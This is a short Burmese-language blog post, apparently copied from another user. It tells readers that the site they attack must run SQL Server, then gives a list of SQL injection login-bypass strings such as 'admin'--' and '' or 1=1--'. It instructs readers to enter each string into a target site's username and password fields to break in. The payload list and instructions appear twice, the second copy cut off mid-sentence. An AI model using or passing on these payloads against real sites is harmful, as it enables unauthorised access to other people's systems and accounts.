ကိုယ္တုိက္ခုိက္မယ့္
ဆုိက္ဒ္ဟာ SQL Server ေတာ့သုံးထားရပါမယ္ ။ ေအာက္ကကုဒ္ေတြ ကေတာ့ SQL ရဲ႕
ဆရာ့ဆရာေတြ ထြင္သြားတဲ့နည္းပါ ။ (SQL ကၽြမ္းက်င္ေသာ Programmer
မ်ားကိုမဆုိလုိပါ ။ SQL ရဲ႕ vulnerable ကိုရွာႏုိင္ေသာပုဂၢဳိလ္မ်ားကိုဆုိလုိပါတယ္
။ ) ။ ေအာက္ပါေပး ထားတဲ့နည္းကေတာ့ SQL ဆုိက္ဒ္ေတြကို ၀င္လုိ႕ရတဲ့ User
Name နဲ႕ Password ေတြပါ ။ SQL Inject တစ္ခုမွ်သာျဖစ္ပါတယ္ ။
CODE:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
အထက္ပါ ကုဒ္ေတြကိုဘယ္လုိအသုံးခ်မလဲ ?လြယ္ပါတယ္ Inject ကုဒ္တစ္ခုခ်င္းစီကို Login ရဲ႕ UserNameနဲ႕ Password မွာ႐ိုက္ထည့္ေပးလုိက္႐ုံပဲျဖစ္ပါတယ္ ။ ေက်းဇူးတင္ပါတယ္
က်ေနာ္ သိမ္းထာတဲ့ နည္းပညာမွတ္တမ္းေတြကေန မွ်လိုက္တာပါ...
CODE:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
အထက္ပါ ကုဒ္ေတြကိုဘယ္လုိအသုံးခ်မလဲ ?လြယ္ပါတယ္ Inject ကုဒ္တစ္ခုခ်င္းစီကို Login ရဲ႕ UserNameနဲ႕ Password မွာ႐ိုက္ထည့္ေပးလုိက္႐ုံပဲျဖစ္ပ
က်ေနာ္ သိမ္းထာတဲ့ နည္းပညာမွတ္တမ္းေတြကေန မွ်လိုက္တာပါ...
ကိုလင္း-သလႅာ၀တီ ပို႕မွ ကူးယူေဖာ္ျပသည္...
No comments:
Post a Comment